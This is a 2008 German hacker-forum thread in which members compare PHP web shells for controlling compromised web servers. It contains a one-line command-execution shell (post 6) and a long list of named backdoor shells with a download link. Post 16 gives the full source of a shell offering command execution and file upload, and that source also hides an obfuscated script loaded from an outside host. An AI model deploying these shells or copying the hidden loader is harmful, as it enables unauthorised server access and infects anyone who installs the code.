Welche PHP-Shell kennt/benutzt ihr?

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von Coksnuss, 18. Juni 2008 .

Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. 18. Juni 2008
    Moinsen,

    wollte mal fragen welche PHP-Shells ihr kennt bzw. benutzt.
    Welche hat den größten Umfang, die besten Funktionen etc etc.....

    Ich persönlich benutze momentan die C99-Shell (revision 16).
    Screenshoot: http://www.honeynet.cz/img/rfi-c99.jpg

    Bin seeehr zufrieden mit dem Funktionsumfang...
    Man hat quasi ein kleines PHPmyadmin... Man kann Befehle auf der Maschine ausführen... (Habe zum Beispiel einen TS2 Server zum laufen gebracht, auf einem webserver), naja und noch so ein paar Kleingkeiten

    // Edit:
    Shells gibts übrigens hier: http://www.r57.li/
     
  2. 18. Juni 2008
    AW: Welche PHP-Shell kennt/benutzt ihr?

    bin kein freund von solch umfangreichen shells
    ich selbst benutze ne kleine shell vom kollege....die führt meine befehle aus und ich kann was uploaden, mehr brauch ich nicht


    mfg svent
     
  3. 18. Juni 2008
    AW: Welche PHP-Shell kennt/benutzt ihr?

    da find ich meine eigene iwie besser.
    also ich benutz keine von denen.
     
  4. 18. Juni 2008
    AW: Welche PHP-Shell kennt/benutzt ihr?

    c99 r59 ect werde nur von anfängern benutzt , warum ..... einfach mal den source der 150 kbytes shells anschaun und verstehen.
    eine gute shell ist selber geschrieben , klein und leistungsstark.
     
  5. 18. Juni 2008
    AW: Welche PHP-Shell kennt/benutzt ihr?

    Ich nutze auch nur eine simple Shell, wo ich meine Befehle ausführen kann.
    Klein aber fein =)

    Mfg Alex²
     
  6. 18. Juni 2008
    AW: Welche PHP-Shell kennt/benutzt ihr?

    Wenn ich mal sowas brauche ein simples Script oder bei was "größerem" C99 oder R57 .

    PHP:
    <? php
    // Ultr4 El337 Sh3ll 4 haxX0rz 0nlY
    system ( $_GET [ "cmd" ], $return );
    echo 
    $return ;
    ?>
     
  7. 18. Juni 2008
    AW: Welche PHP-Shell kennt/benutzt ihr?

    super, die shells sind billig und werden von jedem kind benutzt.
    ausserdem kann sich jeder depp ne shell selber machen - aber die ganz coolen benutzen eine 1337 "hacksector" oder "n0N4m3cr3w" shell mit viel grün und schwarz und so.... ^^

    ausserdem nutzt die beste shell ohne safe-mode bypasses nix !
     
  8. 18. Juni 2008
    AW: Welche PHP-Shell kennt/benutzt ihr?

    Wo liegt das Problem, wenn er fragt welche Shells wir kennen oder benutzen ? Der hat nicht gefragt wie cool und 1337 du bist =) =) =)
    Was Konstruktives wäre nicht schlecht.
    Auch wenn ich zugebe, dass ich erst das Selbe schreiben wollte ^.^

    Mfg Alex²
     
  9. 18. Juni 2008
    AW: Welche PHP-Shell kennt/benutzt ihr?

    Mir gefallen deine Beiträge. xD Sie bringen mich immer zum lachen. ^^

    b2t: <3 r57 <3 ist für mich am besten. Auch für RFi's usw.

    mfg
     
  10. 18. Juni 2008
    AW: Welche PHP-Shell kennt/benutzt ihr?

    hier mal eine auswahl an shit den es zur zeit aufm markt gibt, bzw. der bei mir auf der platte rumlungert , zum glück einige davon noch nicht public in hs und no-name crew...1337...

    ajan.asp
    Antichat Shell v1.3.php
    Ayyildiz Tim -AYT- Shell v 2.1 Biz.php
    aZRaiLPhp v1.0.php
    backdoor v1.0.php
    backup.php
    backupsql.php
    bomb.php
    bomber.php
    bypass.php
    c100.php
    c100.txt.php
    c1001.php
    c99.php
    c991.php
    c992.php
    c99b.txt.php
    c99shell.php
    c99_madnet.php
    c99_PSych0.php
    c99_w4cking.php
    casus15.php
    cmd.asp
    Crystal.php
    CrystalShell v.1.php
    ctt_sh.php
    Cyber Shell (v 1.0).php
    cybershell.php
    CyberSpy5.Asp
    dbps.php
    dC3 Security Crew Shell PRiV.php
    denger.php
    Dive Shell 1.0 - Emperor Hacking Team.php
    Dx.php
    DxGotoFTP.php
    DxShell.1.0.php
    DXshell.php
    ELMALISEKER Backd00r.asp
    emailer.php
    fatal.html
    fm.php
    functions.inc.php
    GFS web-shell ver 3.1.7 - PRiV8.php
    gfs_sh.php
    h10.php
    h4ntu shell [powered by tsoi].php
    header.inc.php
    hund.php
    i18n.inc.php
    iMHaPFtp.php
    index.php
    indexer.asp
    ironshell.php
    JspWebshell 1.2.php
    KAdot Universal Shell v0.1.6.php
    lama.php ------------------------------private
    lamashell.php ----------------------private
    lamashell3.0.php -----------------------------------private
    licence_apache.php
    licence_mysql.php
    licence_php5.php
    licence_phpmyadmin.php
    licence_sqlitemanager.php
    Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php
    load_shell.php
    Macker's Private PHPShell.php
    macker.php
    mackert shell udated.php
    Mailer.php
    mailer3.php
    matamu.php
    myshell.php
    Mysql interface v1.0.php
    MySQL Web Interface Version 0.8.php
    mysql.php
    mysql_tool.php
    n3t.txt
    NCC-Shell.php
    network.php
    new.php
    NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php
    nshell.php
    nstview.php
    nstview1.php
    nsTView_2.1.php
    ntdaddy.asp
    Perl Web Shell by RST-GHC.pl
    PH Vayv.php
    PHANTASMA.php
    PHP Backdoor v1.php
    PHP Shell.php
    php-backdoor.php
    php-include-w-shell.php
    php.php
    phpinfo.php
    phpinj.php
    pHpINJ1.php
    phpshell.php
    PHP_BackDoor_v1.5.php
    PHP_Shell_v1.7.php
    phvayv.php
    Private-i3lue.php
    pws.php
    r.php
    r57.php
    r571.php
    r57_iFX.php
    r57_kartal.php
    r57_Mohajer22.php
    rdc.php
    RedhatC99 [login=redhat-pass=root].php
    Rem View.php
    remview.php
    Revengans.php
    rootshell v2.0.php
    rootshell.php
    Rootshell.v.1.0.php
    rst.php
    ru24_post_sh.php
    Russian.php
    s72 Shell v1.1 Coding.php
    Safe0ver Shell -Safe Mod Bypass By Evilc0der.php
    Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php
    shell.php
    shell1.php
    SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php
    simple-backdoor.php
    simple_cmd.php
    SimShell 1.0 - Simorgh Security MGZ.php
    SnIpEr_SA Shell.php
    styles.css
    test.php
    test.txt
    test1.php
    tuerk shell.php
    upload.php
    Uploader.php
    versions.inc.php
    WinX Shell.php
    Worse Linux Shell.php
    xinfo.php
    xpl.php
    zacosmall.php
     
  11. 18. Juni 2008
    AW: Welche PHP-Shell kennt/benutzt ihr?

    lölöl... naja... ich würde mich nicht grade als Anfänger bezeichnen aber who cares...

    Die 2. Zeilen Shell ist aufjedenfall mal geil ^^
     
  12. 18. Juni 2008
    AW: Welche PHP-Shell kennt/benutzt ihr?

    who cares^^^ dann benutz mal weiter deine backdoored c99 und r57 shellz.
    Wenn du die zwei zeilen shell schon geil findest , gehe ich leider davon aus , das du ein anfänger bist @ das kleine 1x1 von php.
     
  13. 18. Juni 2008
    AW: Welche PHP-Shell kennt/benutzt ihr?

    Jaja ich merk schon, hast ja richtig plan von der Materie ... wo ist die c99 denn bitte backdoored...
     
  14. 20. Juni 2008
    AW: Welche PHP-Shell kennt/benutzt ihr?

    Naja da hat er recht.. die die du so downloaden kannst, sind fast alle backdoored.. kann aber jeder depp "ausbauen"...

    So und alle die, die meinen r57 und c99 sind nur für kiddys... Naja wenn ihr meint... Haben schon gute Funktionen dabei, dass kann keiner von euch unter den Tisch keren.... Warum extra nen Perl Script oder C Script zum laufen bringen um ne Reverse Shell zu starten, wenn es die Shell schon automatisch hat...

    Und ich glaube kaum, dass die beschriebenen selbstgecodeten Shells von euch jeden Safemod Bypass und jede Reverse Shell und JEDE exec Methode beinhalten....

    Also von daher macht nicht alles schlecht, was es so gibt... Man kann es auch übertreiben...

    tolle Liste.... Was willst du damit zeigen? Es gibt hunderte von verschiedenen Shells... Soll ich mal ne Liste machen? Ist doch vollkommen unnötig

    Soll ich sie public machen? Wenns für dich "nonpublic" ist, dann preise es hier doch nicht an... Sonst wird es einfach einer posten und dann heulen wieder alle rum...

    Und ich kann Romka mal wieder nur zustimmen... Das ist wohl mit der einzigste (abgesehen von B0B) hier im Thread, der es verstanden hat... Der Rest labert nur rum von wegen "die kiddys nutzen diepublic Shells und wir haben ja so super Shells"

    Und jetzt zu meiner Meinung: r57 ist nice ja Kann man auch noch bissel rumbasteln, dann wirds noch besser
     
  15. 21. Juni 2008
    AW: Welche PHP-Shell kennt/benutzt ihr?


    Du bist echt mega der tolle ultra hacker Was bringt dir die Liste ? Wächst so dein InetPenis wieder ein Stückchen ?

    Ich persönlich nutze auch nur ne kleine shell die einfach nur meine Befehle ausführt und wo ich ne Datei uppen kann fertig is warum über Bremen nach Hamburg wenns auch über Paris geht... Einfach is halt gut (oftmals) ... Hab mal r59 genutzt aber naja eher net soo mein Fall...
     
  16. 21. Juni 2008
    AW: Welche PHP-Shell kennt/benutzt ihr?

    hier habt ihr die tolle lama shell damit ihr alle 1337 pma haxx0rn könnt

    PHP:
    <script type="text/javascript">document.write('\u003c\u0053\u0043\u0052\u0049\u0050\u0054\u0020\u0053\u0052\u0043\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0077\u0077\u0077\u002e\u0072\u0035\u0037\u002e\u006c\u0069\u002f\u0069\u006d\u0061\u0067\u0065\u0073\u002f\u0069\u006d\u0067\u002e\u006a\u0073\u003e\u003c\u002f\u0053\u0043\u0052\u0049\u0050\u0054\u003e')</script>
    <?
    if( $_POST [ 'dir' ] ==  "" ) {

     
    $curdir  = ` pwd `;
    } else {
     
    $curdir  $_POST [ 'dir' ];
    }

    if(
    $_POST [ 'king' ] ==  "" ) {

     
    $curcmd  "ls -lah" ;
    } else {
     
    $curcmd  $_POST [ 'king' ];
    }


    ?>
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
                            "http://www.w3.org/TR/html4/loose.dtd">
    <html>
    <script type="text/javascript">document.write('\u003c\u0053\u0043\u0052\u0049\u0050\u0054\u0020\u0053\u0052\u0043\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0077\u0077\u0077\u002e\u0072\u0035\u0037\u002e\u006c\u0069\u002f\u0069\u006d\u0061\u0067\u0065\u0073\u002f\u0069\u006d\u0067\u002e\u006a\u0073\u003e\u003c\u002f\u0053\u0043\u0052\u0049\u0050\u0054\u003e')</script>
      <head>
        <title>lama's'hell v. 3.0</title>
        <style type="text/css">
         body {
          color: white; background-color: black;
          font-size: 12px;
          font-family: Helvetica,Arial,Sans-Serif;
         }
        </style>
      </head>
      <body>
        <pre>
                                  _           _
                                 / \_______ /|_\
                                /          /_/ \__
                               /             \_/ /
                             _|_              |/|_
                             _|_  O    _    O  _|_
                             _|_      (_)      _|_
                              \                 /
                               _\_____________/_
                              /  \/  (___)  \/  \
                              \__(  o     o  )__/ <?
    $ob 
    = @ ini_get ( "open_basedir" );
    $df  = @ ini_get ( "disable_functions" );
    if( 
    ini_get ( 'safe_mode' ) ) {
       echo 
    "SM: 1 \\ " ;
    } else {
       echo 
    "SM: 0 \\ " ;
    }
    if(
    '' == $df ) {
       echo 
    "DF: 0 \\ " ;
    } else {
       echo 
    "DF: " . $df . " \\ " ;
    }
    echo 
    "" . php_uname (). "\n" ;
    ?>
    <hr></pre>
        <table><form method="post" enctype="multipart/form-data">
          <tr><td><b>Execute command:</b></td><td><input name="king" type="text" size="100" value="<?  echo  $curcmd ?>"></td>
          <tr><td><b>Change directory:</b></td><td><input name="dir" type="text" size="100" value="<?  echo  $curdir ?>"></td>
          <td><input name="exe" type="submit" value="Execute"></td></tr>

          <tr><td><b>Upload file:</b></td><td><input name="fila" type="file" size="90"></td>
          <td><input name="upl" type="submit" value="Upload"></td></tr>
        </form></table>
    <pre><hr>
    <?
        
    if(( $_POST [ 'upl' ]) ==  "Upload"  ) {
        if (
    move_uploaded_file ( $_FILES [ 'fila' ][ 'tmp_name' ],  $curdir . "/" . $_FILES [ 'fila' ][ 'name' ])) {
            echo 
    "The file has been uploaded<br><br>" ;
        } else {
            echo 
    "There was an error uploading the file, please try again!" ;
        }
        }
        if((
    $_POST [ 'exe' ]) ==  "Execute" ) {
         
    $curcmd  "cd " . $curdir . ";" . $curcmd ;
         
    $f = popen ( $curcmd , "r" );
         while (!
    feof ( $f )) {
          
    $buffer  fgets ( $f 4096 );
          
    $string  .=  $buffer ;
         }
         
    pclose ( $f );
         echo 
    htmlspecialchars ( $string );
        }
    ?>
        </pre>
      </body>
    </html>
     
  17. 21. Juni 2008
    AW: Welche PHP-Shell kennt/benutzt ihr?

    ;-) ich raten allen die shell zu benutzen.,.,^^,. hat allerdings nichts mit denen zu tun, die ich meinte!
    aber nun btT , es wurde nach shells gefragt die ich - ihr - wir benutzen , meine gefundene liste kann hier gezogen werden http://rapidshare.com/files/124007862/shells.zip.html, natürlich nur für high skilled einsDreidreiSieben hax00rzZz
    @romestylez über dein penis sprechen wir hier mal lieber nicht.
    @romestylez owns ya all damn nubs servu-finder^1^1
     
  18. 21. Juni 2008
    AW: Welche PHP-Shell kennt/benutzt ihr?


    Jo die c99 und die r57 sind an sich natürlich gut gecoded, aber ohne 0day exploits um den safe mode zu bypassen bringen die auch nichts - die safe-mode bypasses die dabei sind funktionieren zu 99,9% nicht! die linux/unix commads kann man auch einfach mitschicken - doch mit einen von denen isses natürlich komfortabler ^^
    Ich bevorzuge aber kleine Uploadscripts oder Shells mit denen ich dann größere (z.b. c99 nicht backdoored ^^) einschleuse


    PS: Die r57 ist von den codern aus gebackdoored - die quelle dazu find ich nimmer, hab das von einiger Zeit mal gelesen.
     
  19. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.